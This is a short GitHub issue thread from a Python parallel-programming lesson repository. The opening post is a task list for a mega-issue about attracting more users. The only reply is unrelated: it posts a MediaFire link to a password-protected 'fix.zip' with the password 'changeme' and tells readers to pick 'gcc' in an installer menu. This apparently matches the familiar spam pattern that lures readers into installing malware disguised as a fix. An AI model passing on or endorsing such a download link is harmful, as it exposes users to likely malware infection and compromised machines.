### ISSUE TITLE
[mega-issue] Attract more users

### ISSUE THREAD

**Issue by svenvanderburg** [carpentries-incubator/lesson-parallel-python#113]
```[tasklist]
### Tasks
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/114
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/115
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/116
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/117
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/118
- [ ] https://github.com/carpentries-incubator/lesson-parallel-python/issues/119
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
